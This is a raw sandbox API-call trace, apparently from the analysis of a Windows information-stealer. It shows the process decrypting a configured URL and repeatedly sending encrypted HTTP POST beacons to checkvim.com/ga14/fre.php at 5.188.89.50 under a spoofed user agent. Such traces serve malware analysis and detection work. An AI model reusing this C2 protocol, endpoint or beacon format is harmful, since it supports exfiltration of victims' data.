(lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0219.227] GetProcessHeap () returned 0x840000 [0219.227] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8714e8 [0219.227] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0219.227] GetProcessHeap () returned 0x840000 [0219.227] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8714e8 | out: hHeap=0x840000) returned 1 [0219.228] GetProcessHeap () returned 0x840000 [0219.228] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872af8 | out: hHeap=0x840000) returned 1 [0219.228] GetProcessHeap () returned 0x840000 [0219.228] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0219.228] GetProcessHeap () returned 0x840000 [0219.228] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fdd0 [0219.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.229] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0219.235] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.236] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0219.244] GetProcessHeap () returned 0x840000 [0219.244] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0219.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.245] CryptImportKey (in: hProv=0x86ff90, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e370) returned 1 [0219.246] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.247] CryptSetKeyParam (hKey=0x87e370, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0219.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.248] CryptSetKeyParam (hKey=0x87e370, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0219.248] GetProcessHeap () returned 0x840000 [0219.248] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0219.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.249] CryptDecrypt (in: hKey=0x87e370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fdd0, pdwDataLen=0x19f9a4 | out: pbData=0x87fdd0, pdwDataLen=0x19f9a4) returned 1 [0219.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.251] CryptDestroyKey (hKey=0x87e370) returned 1 [0219.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.252] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0219.252] GetProcessHeap () returned 0x840000 [0219.252] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0219.253] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0219.253] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0219.254] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0219.255] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0219.255] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0219.256] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0219.256] GetProcessHeap () returned 0x840000 [0219.256] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8711a0 [0219.256] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c80*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0219.258] GetProcessHeap () returned 0x840000 [0219.258] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c78 [0219.258] socket (af=2, type=1, protocol=6) returned 0x2c0 [0219.258] connect (s=0x2c0, name=0x878c80*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0219.330] FreeAddrInfoW (pAddrInfo=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c80*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0219.330] GetProcessHeap () returned 0x840000 [0219.330] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x870128 [0219.330] GetProcessHeap () returned 0x840000 [0219.330] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0219.331] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0219.332] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0219.332] GetProcessHeap () returned 0x840000 [0219.332] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0219.332] GetProcessHeap () returned 0x840000 [0219.332] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0219.332] GetProcessHeap () returned 0x840000 [0219.332] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fb90 [0219.332] GetProcessHeap () returned 0x840000 [0219.333] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0219.333] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0219.334] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0219.335] GetProcessHeap () returned 0x840000 [0219.335] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0219.335] GetProcessHeap () returned 0x840000 [0219.335] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0219.335] send (s=0x2c0, buf=0x873a58*, len=237, flags=0) returned 237 [0219.335] send (s=0x2c0, buf=0x87eb58*, len=159, flags=0) returned 159 [0219.335] GetProcessHeap () returned 0x840000 [0219.335] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0219.335] recv (in: s=0x2c0, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0219.694] GetProcessHeap () returned 0x840000 [0219.694] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0219.694] GetProcessHeap () returned 0x840000 [0219.694] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb90 | out: hHeap=0x840000) returned 1 [0219.694] GetProcessHeap () returned 0x840000 [0219.694] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0219.694] GetProcessHeap () returned 0x840000 [0219.694] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870128 | out: hHeap=0x840000) returned 1 [0219.694] closesocket (s=0x2c0) returned 0 [0219.695] GetProcessHeap () returned 0x840000 [0219.695] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c78 | out: hHeap=0x840000) returned 1 [0219.695] GetProcessHeap () returned 0x840000 [0219.695] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0219.695] GetProcessHeap () returned 0x840000 [0219.695] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fdd0 | out: hHeap=0x840000) returned 1 [0219.695] GetProcessHeap () returned 0x840000 [0219.695] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8711a0 | out: hHeap=0x840000) returned 1 [0219.695] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x128c) returned 0x2c0 [0219.697] Sleep (dwMilliseconds=0xea60) [0219.699] GetProcessHeap () returned 0x840000 [0219.699] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fc68 [0219.699] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.700] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0219.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.723] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0219.732] GetProcessHeap () returned 0x840000 [0219.732] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0219.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.733] CryptImportKey (in: hProv=0x86f688, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e470) returned 1 [0219.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.734] CryptSetKeyParam (hKey=0x87e470, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0219.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.735] CryptSetKeyParam (hKey=0x87e470, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0219.735] GetProcessHeap () returned 0x840000 [0219.735] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0219.736] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.746] CryptDecrypt (in: hKey=0x87e470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fc68, pdwDataLen=0x19f9a4 | out: pbData=0x87fc68, pdwDataLen=0x19f9a4) returned 1 [0219.747] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.748] CryptDestroyKey (hKey=0x87e470) returned 1 [0219.748] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.749] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0219.749] GetProcessHeap () returned 0x840000 [0219.749] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0219.749] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0219.750] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0219.750] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0219.751] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0219.752] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0219.752] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0219.753] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0219.753] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0219.753] GetProcessHeap () returned 0x840000 [0219.753] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871268 [0219.753] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0219.754] GetProcessHeap () returned 0x840000 [0219.754] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871268 | out: hHeap=0x840000) returned 1 [0219.754] GetProcessHeap () returned 0x840000 [0219.754] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0219.754] GetProcessHeap () returned 0x840000 [0219.754] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc68 | out: hHeap=0x840000) returned 1 [0219.754] GetProcessHeap () returned 0x840000 [0219.754] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f998 [0219.755] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.755] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0219.760] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.760] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0219.771] GetProcessHeap () returned 0x840000 [0219.771] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0219.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.772] CryptImportKey (in: hProv=0x86fce8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e5b0) returned 1 [0219.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.773] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0219.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.774] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0219.774] GetProcessHeap () returned 0x840000 [0219.774] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0219.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.775] CryptDecrypt (in: hKey=0x87e5b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f998, pdwDataLen=0x19f9a4 | out: pbData=0x87f998, pdwDataLen=0x19f9a4) returned 1 [0219.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.776] CryptDestroyKey (hKey=0x87e5b0) returned 1 [0219.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0219.777] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0219.777] GetProcessHeap () returned 0x840000 [0219.777] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0219.778] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0219.778] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0219.779] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0219.779] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0219.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0219.780] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0219.780] GetProcessHeap () returned 0x840000 [0219.780] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871510 [0219.780] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789e0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0219.782] GetProcessHeap () returned 0x840000 [0219.782] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0219.782] socket (af=2, type=1, protocol=6) returned 0x2c4 [0219.782] connect (s=0x2c4, name=0x8789e0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0219.855] FreeAddrInfoW (pAddrInfo=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789e0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0219.856] GetProcessHeap () returned 0x840000 [0219.856] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0219.856] GetProcessHeap () returned 0x840000 [0219.856] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0219.856] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0219.857] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0219.857] GetProcessHeap () returned 0x840000 [0219.857] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0219.857] GetProcessHeap () returned 0x840000 [0219.857] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0219.857] GetProcessHeap () returned 0x840000 [0219.857] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fea8 [0219.858] GetProcessHeap () returned 0x840000 [0219.858] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0219.858] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0219.859] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0219.859] GetProcessHeap () returned 0x840000 [0219.859] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0219.859] GetProcessHeap () returned 0x840000 [0219.859] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0219.859] send (s=0x2c4, buf=0x873a58*, len=237, flags=0) returned 237 [0219.860] send (s=0x2c4, buf=0x87eb58*, len=159, flags=0) returned 159 [0219.860] GetProcessHeap () returned 0x840000 [0219.860] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0219.860] recv (in: s=0x2c4, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0220.237] GetProcessHeap () returned 0x840000 [0220.237] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0220.237] GetProcessHeap () returned 0x840000 [0220.237] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0220.238] GetProcessHeap () returned 0x840000 [0220.238] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0220.238] GetProcessHeap () returned 0x840000 [0220.238] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0220.238] closesocket (s=0x2c4) returned 0 [0220.238] GetProcessHeap () returned 0x840000 [0220.238] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0220.238] GetProcessHeap () returned 0x840000 [0220.238] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0220.238] GetProcessHeap () returned 0x840000 [0220.238] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f998 | out: hHeap=0x840000) returned 1 [0220.238] GetProcessHeap () returned 0x840000 [0220.238] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871510 | out: hHeap=0x840000) returned 1 [0220.239] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x70) returned 0x2c4 [0220.241] Sleep (dwMilliseconds=0xea60) [0220.268] GetProcessHeap () returned 0x840000 [0220.268] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f680 [0220.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0220.270] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0220.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0220.278] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0220.286] GetProcessHeap () returned 0x840000 [0220.286] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0220.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0220.288] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e930) returned 1 [0220.288] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0220.289] CryptSetKeyParam (hKey=0x87e930, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0220.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0220.290] CryptSetKeyParam (hKey=0x87e930, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0220.290] GetProcessHeap () returned 0x840000 [0220.290] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0220.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0220.291] CryptDecrypt (in: hKey=0x87e930, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f680, pdwDataLen=0x19f9a4 | out: pbData=0x87f680, pdwDataLen=0x19f9a4) returned 1 [0220.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0220.291] CryptDestroyKey (hKey=0x87e930) returned 1 [0220.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0220.292] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0220.292] GetProcessHeap () returned 0x840000 [0220.292] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0220.293] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0220.293] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0220.294] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0220.334] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0220.334] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0220.335] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0220.336] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0220.337] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0220.337] GetProcessHeap () returned 0x840000 [0220.337] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0220.337] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0220.337] GetProcessHeap () returned 0x840000 [0220.337] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0220.337] GetProcessHeap () returned 0x840000 [0220.337] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0220.337] GetProcessHeap () returned 0x840000 [0220.337] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0220.337] GetProcessHeap () returned 0x840000 [0220.337] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f7a0 [0220.338] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0220.338] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0220.343] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0220.343] CryptAcquireContextW (in: 